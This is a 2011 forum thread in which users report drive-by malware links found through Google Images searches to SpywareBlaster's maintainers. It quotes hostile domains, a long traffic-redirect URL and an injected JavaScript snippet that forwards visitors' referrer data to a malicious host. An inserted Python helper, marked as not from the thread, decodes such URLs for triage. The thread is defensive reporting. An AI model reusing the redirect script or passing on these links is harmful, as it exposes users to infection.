New bad link submission.

Discussion in 'SpywareBlaster & Other Forum' started by unclebic, Apr 7, 2011.

Thread Status:
Not open for further replies.
  1. unclebic

    unclebic Registered Member

    Joined:
    Oct 15, 2008
    Posts:
    2
    I found this one trolling around looking at a Google image search, go figure. I did report the link on their search, and wanted to add it to the list for SpywareBlaster.

    The links below would have gotten me if not for SpySweeper and I knew to kill Firefox with the Task Manager. Trying to restart Firefox was a bit of a pain since it now seems to automatically restore all pages without asking the first time. The next time, it did bring up the dialog page with the pages to restore or not. It was pretty easy to figure which page was up to no good.

    Don't click or open the links below.

    "antispyware-infection.co.cc/fast-scan"

    "pgxyyyoq.cw.cm/in.cgi?2&seoref=http%3A%2F%2Fwww.google.com%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2F1.bp.blogspot.com%2F_yNwrvgG4JbM%2FSVk2wfBYreI%2FAAAAAAAAAbs%2F3Hj0ogl2GgA%2Fs320%2Fodette.jpg%26imgrefurl%3Dhttp%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%2526page%253D3%26usg%3D__ENyYpL7WFgu7ps1Dr9CFEW-m5Rc%3D%26h%3D320%26w%3D246%26sz%3D20%26hl%3Den%26start%3D0%26sig2%3DsBHzpbuuzruowdgDiYgQdA%26zoom%3D1%26tbnid%3DT7VnTzL3HD4HMM%3A%26tbnh%3D125%26tbnw%3D97%26ei%3De3OdTbWBBaTy0gGF1pHABA%26prev%3D%2Fsearch%253Fq%253DOdette%252BAnnable%2526hl%253Den%2526newwindow%253D1%2526safe%253Doff%2526client%253Dfirefox-a%2526hs%253DGdQ%2526sa%253DX%2526rlz%253D1R1GGGL_en___US357%2526biw%253D1920%2526bih%253D946%2526tbm%253Disch%2526prmd%253Divnsuo0%252C114%26itbs%3D1%26iact%3Dhc%26vpx%3D226%26vpy%3D228%26dur%3D3234%26hovh%3D256%26hovw%3D196%26tx%3D137%26ty%3D136%26oei%3De3OdTbWBBaTy0gGF1pHABA%26page%3D1%26ndsp%3D82%26ved%3D1t%3A429%2Cr%3A29%2Cs%3A0%26biw%3D1920%26bih%3D946&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%26page%3D3&default_keyword=default"
     
  2. ZenoK

    ZenoK Registered Member

    Joined:
    Apr 7, 2011
    Posts:
    2
    I just came across this bad link. Fortunately my antivirus caught it and Privoxy logged its behaviour.

    I found it also by searching an image on Google Map, an

    The image was linked on
    bank.owned-properties.info, which appears to be involved or at least compromised (the contact links are dead).
    The image is located on
    bank-owned-properties.info/45.php

    This is a script that redirects to pgxyyyoq.cw.cm, also passing along the referrer URL.
    <script>var url = "http://pgxyyyoq.cw.cm/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";

    That then redirects to sexgoogle.info/TF19, which contains one of those infamous obscured JavaScript codes.

    The code then tries to load a Java applet that should install Crypt.XPACK.Gen.

    If I try to call the pgxyyyoq script without parameters, I land on wolandtraffic.com.

    To summarize I would consider all the following links as hostile:
    pgxyyyoq.cw.cm
    sexgoogle.info

    These ones as suspects:
    bank-owned-properties.info
    wolandtraffic.com
     
    Last edited: Apr 7, 2011
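As an added example (not from the thread), a small Python helper for triaging a captured in.cgi URL like the one quoted above: it unpicks the nested percent-encoding to recover the search query, the clicked result and the referrer, and flags the unfilled $keyword/$se template tokens that the redirect script passes through verbatim. The sample URL is constructed from the quoted one, shortened, with the image host replaced by example.invalid.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the hostile in.cgi URL quoted in the thread, shortened but with the
# same shape (image host replaced by example.invalid).
SAMPLE_URL = (
    "http://pgxyyyoq.cw.cm/in.cgi?2&seoref="
    "http%3A%2F%2Fwww.google.com%2Fimgres%3Fimgurl%3Dhttp%3A%2F%2Fexample.invalid%2Fodette.jpg"
    "%26imgrefurl%3Dhttp%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%2526page%253D3"
    "%26prev%3D%2Fsearch%253Fq%253DOdette%252BAnnable%2526tbm%253Disch"
    "&parameter=$keyword&se=$se&ur=1"
    "&HTTP_REFERER=http%3A%2F%2Fsynergia.org.pl%2Fplatnosci%2Fodette-annable%26page%3D3"
    "&default_keyword=default"
)

def _first(qs, key):
    """First value of a parse_qs entry, or '' when the key is absent."""
    return qs.get(key, [""])[0]

def decode_tds_url(url):
    """Unpick the nested encoding of a traffic-distribution redirect and return the chain."""
    outer = urlsplit(url)
    # parse_qs percent-decodes each value once; keep_blank_values keeps the bare "2" selector
    outer_qs = parse_qs(outer.query, keep_blank_values=True)
    # seoref now reads as a plain Google imgres URL whose own values are still encoded once
    seoref = urlsplit(_first(outer_qs, "seoref"))
    seoref_qs = parse_qs(seoref.query, keep_blank_values=True)
    # prev is the original /search path; the parse above decoded it, so split it once more
    prev_qs = parse_qs(urlsplit(_first(seoref_qs, "prev")).query)
    referrer = _first(outer_qs, "HTTP_REFERER")
    # $keyword / $se left verbatim: the template was emitted client-side without substitution
    unfilled = sorted(k for k, v in outer_qs.items() if v and v[0].startswith("$"))
    return {
        "redirect_host": outer.hostname,
        "search_engine_host": seoref.hostname,
        "search_query": _first(prev_qs, "q"),
        "clicked_result": _first(seoref_qs, "imgrefurl"),
        "referrer": referrer,
        "referrer_host": urlsplit(referrer).hostname,
        "unfilled_template_params": unfilled,
    }

def looks_like_tds(url):
    """Heuristic: a referrer-bearing redirect to an unrelated host with raw template tokens."""
    info = decode_tds_url(url)
    return (bool(info["referrer_host"])
            and info["referrer_host"] != info["redirect_host"]
            and bool(info["unfilled_template_params"]))
```

Run against a logged URL, the output shows the compromised referrer site equalling the clicked image result, which is what you expect when the injected script forwards document.referrer and document.URL.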
  3. ZenoK

    ZenoK Registered Member

    Joined:
    Apr 7, 2011
    Posts:
    2
    And some more mirrors of the same stuff.

    Always while searching for "gasometer wien" in Google Images, I got attempts to infect from:

    rwjhlqjg.cw.cm/

    Added .cw.cm to the block list.

    The compromised site used for the attack is: hariyoanaklaut.com
     
    Last edited: Apr 7, 2011
  4. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,997
    Hi,

    Many thanks for the submissions & information. We'll take a look. :)

    Best regards,

    -Javacool
     
  5. MikeBCda

    MikeBCda Registered Member

    Joined:
    Jan 5, 2004
    Posts:
    1,627
    Location:
    southern Ont. Canada
    Is it a safe bet that this was at least partly behind the unusual number of restricted-site additions in the most recent def updates?
     
  6. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,997
    The Restricted Sites additions in the 4/10/2011 update were actually related to the Lizamoon SQL injection attack that infected numerous websites.
     